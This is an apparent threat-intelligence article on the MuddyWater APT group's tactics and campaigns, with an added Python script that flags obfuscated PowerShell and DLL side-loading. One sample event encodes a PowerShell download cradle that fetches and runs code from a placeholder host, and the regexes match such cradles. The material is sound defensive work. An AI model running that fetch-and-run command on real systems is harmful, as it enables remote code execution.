Throughout the years, there have been many advanced persistent threat (APT) groups, such as the Equation Group, Elfin, Turla and more, that have been able to attack organizations, go dark, then come back with new tricks up their sleeves. Another threat actor that has had multiple attacks starting as early as 2017 is the MuddyWater group.
This organization had notable attacks in 2017, 2018 and 2021 targeting a wide range of both government and private-sector organizations, including telecommunications, defense, local government, and oil and natural gas sectors. Their strikes have landed everywhere from Asia to Africa, Europe to North America, and MuddyWater is still active in the cyber threat landscape, having been observed as recently as this year.
The MuddyWater group
The MuddyWater group goes by many names, including Earth Vetala, MERCURY, Static Kitten, Seedworm and TEMP.Zagros. According to a CISA alert, it is a subordinate component within the Iranian Ministry of Intelligence and Security (MOIS) and has led cyber campaigns in support of MOIS objectives since around 2018. Through their attacks, these APT actors provide stolen data and access to the Iranian government and other malicious cyber actors.
MuddyWater actors exploit publicly reported vulnerabilities and use open-source tools to gain access to private data on targets’ systems and deploy ransomware. They are known for their spearphishing campaigns that coax victims into downloading ZIP files that contain either an Excel file with malicious embedded links, which then communicate with the actor’s C2 server, or a PDF that drops a malicious file onto the victim’s network.
They also stay on victim networks by side-loading dynamic link libraries (DLLs), which tricks legitimate programs into running malware, and by obfuscating PowerShell scripts to hide command and control (C2) functions. According to the same 2022 CISA alert, the FBI, CISA, CNMF and NCSC-UK have all observed MuddyWater recently using various malware — such as variants of PowGoop, Small Sieve, Canopy or Starwhale, Mori and POWERSTATS — for loading malware, backdoor access, persistence and exfiltration, alongside other tools.
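The two persistence techniques named above, obfuscated PowerShell and DLL side-loading, both leave traces in ordinary endpoint telemetry. The script below is an added example, not code from the original article or from any of the agencies or vendors it cites, showing how a defender might triage constructed process-creation and image-load events for those traces. The event shape, the list of commonly side-loaded system DLL names and the "trusted directory" rule are all assumptions made for illustration; real telemetry schemas and allow-lists vary by product.

```python
import base64
import re
from typing import Dict, List, Optional

# Constructed sample events shaped like endpoint process-creation and
# image-load telemetry. Paths, user names and URLs are invented.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # obfuscated PowerShell launcher with a base64 (UTF-16LE) command
        "type": "process",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe -nop -w hidden -enc " + base64.b64encode(
            "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
            .encode("utf-16le")).decode(),
    },
    {   # benign scheduled backup script, should not be flagged
        "type": "process",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r"powershell.exe -File C:\Scripts\backup.ps1",
    },
    {   # legitimate-looking binary loading a system DLL name from its own folder
        "type": "image_load",
        "image": r"C:\Users\alice\AppData\Roaming\Updater\signed_tool.exe",
        "dll": r"C:\Users\alice\AppData\Roaming\Updater\version.dll",
    },
    {   # same DLL name loaded from System32, the expected location
        "type": "image_load",
        "image": r"C:\Program Files\Vendor\tool.exe",
        "dll": r"C:\Windows\System32\version.dll",
    },
]

# PowerShell accepts unambiguous prefixes of -EncodedCommand, so match -e/-ec/-enc too.
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
SUSPICIOUS_FLAGS = re.compile(
    r"(?i)(?:^|\s)-(?:nop|noprofile|w(?:indowstyle)?\s+hidden|ep\s+bypass|executionpolicy\s+bypass)")
DOWNLOAD_CRADLE = re.compile(r"(?i)IEX|Invoke-Expression|DownloadString|Net\.WebClient|FromBase64String")

# Illustrative set of DLL names frequently abused for side-loading (assumption, not exhaustive).
SYSTEM_DLL_NAMES = {"version.dll", "dbghelp.dll", "wininet.dll", "cryptbase.dll", "dwmapi.dll"}
TRUSTED_DLL_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload (UTF-16LE base64), or None."""
    match = ENCODED_ARG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def flag_powershell(command_line: str) -> List[str]:
    """Reasons a PowerShell command line looks obfuscated or like a download cradle."""
    reasons = []
    if SUSPICIOUS_FLAGS.search(command_line):
        reasons.append("suspicious launch flags")
    decoded = decode_encoded_command(command_line)
    if decoded is not None:
        reasons.append("encoded command")
        if DOWNLOAD_CRADLE.search(decoded):
            reasons.append("download cradle in decoded command")
    # Check the visible part only, so a base64 blob cannot trigger a false match.
    if DOWNLOAD_CRADLE.search(ENCODED_ARG.sub(" ", command_line)):
        reasons.append("download cradle in plain command")
    return reasons


def flag_dll_sideload(image: str, dll: str) -> List[str]:
    """Flag a well-known system DLL name loaded from the executable's own, untrusted folder."""
    dll_dir, _, dll_name = dll.lower().rpartition("\\")
    image_dir = image.lower().rpartition("\\")[0]
    if dll_name in SYSTEM_DLL_NAMES and not dll_dir.startswith(TRUSTED_DLL_DIRS) and dll_dir == image_dir:
        return [f"system DLL name {dll_name} loaded from untrusted location beside the executable"]
    return []


def triage(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event index -> reasons for every event that trips a detector."""
    hits: Dict[int, List[str]] = {}
    for idx, ev in enumerate(events):
        if ev["type"] == "process" and "powershell" in ev["image"].lower():
            reasons = flag_powershell(ev["command_line"])
        elif ev["type"] == "image_load":
            reasons = flag_dll_sideload(ev["image"], ev["dll"])
        else:
            reasons = []
        if reasons:
            hits[idx] = reasons
    return hits


if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(reasons)}")
```

Decoding the encoded command before pattern matching is the important step: the base64 blob itself is opaque to string rules, and the hidden-window and no-profile flags alone also appear in some legitimate automation, so a detection that only fires on the combination of launch flags and a decoded download cradle keeps the false-positive rate manageable.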
According to an Avertium article, due to the group using a variety of lures and targeting different geographic regions, MuddyWater is likely a conglomerate of subgroups that operate independently. Each group is motivated by espionage, intellectual theft, and destructive or disruptive operations.
To achieve these goals, MuddyWater supports the political dominance of Iran, and they are partly motivated by the nation-state’s interests, which helps determine their targets. In pursuit of their intellectual property theft and disruption goals, MuddyWater has carried out aggressive campaigns and deployed ransomware, such as Thanos, which lets users build their own custom ransomware for locking up victims’ files.
Since as early as 2017, MuddyWater started moving in on a wide range of targets, located across at least four continents. Cybersecurity experts noted in 2018 that MuddyWater was far from done after their first campaign. According to TrendMicro, “The attackers are not merely interested in a one-off campaign, but will likely continue to perform cyberespionage activities against the targeted countries and industries.” In fact, they have launched other attacks since then, and researchers can attribute those attacks to MuddyWater because of the similarities in attack style and targeted victims.
In 2017, the targets of these attacks were in India, Iraq, Israel, Pakistan, Saudi Arabia, Turkey, the United Arab Emirates and the U.S. The malicious documents attached to the emails tried to mimic those from government organizations, some containing government emblems, such as for the Ministry of Internal Affairs of the Republic of Tajikistan.
In 2018, MuddyWater’s targets were located in Turkey, Pakistan and Tajikistan. The documents again attempted to pass as if from government organizations, including the Iraqi National Intelligence Service, the National Security Agency and the Ministry of Interior of Saudi Arabia.
In 2021, they targeted Pakistan in April, Armenia in June and then Turkey in November. During these attacks, different methods were used, which shows how adaptable the group is. It also shows they are far from stopping their attacks anytime soon because they have yet to be caught and can develop different strategies in each campaign.
Understanding cyber threats
Because there are multiple groups that make up MuddyWater, each working independently, cybersecurity experts are still learning about their operations. They are still an active group, which means that the world likely hasn’t seen their last attack campaign. One takeaway from these previous attacks is that they use similar tactics. Staying educated about how cyber threats infiltrate networks can allow organizations to prepare and up their defenses.
Knowing to use extreme caution when receiving emails that appear to come from government officials can help protect against MuddyWater’s attack attempts. Training employees to recognize malicious behavior, such as phishing links, and staying up to date with known vulnerabilities can only improve the likelihood of keeping an organization safe. The more often a group attacks, the more cybersecurity experts can learn about them and find their mistakes, which will eventually lead to the attackers being apprehended. Until then, though, maintaining strong cybersecurity practices is the best defense against any cyberattack.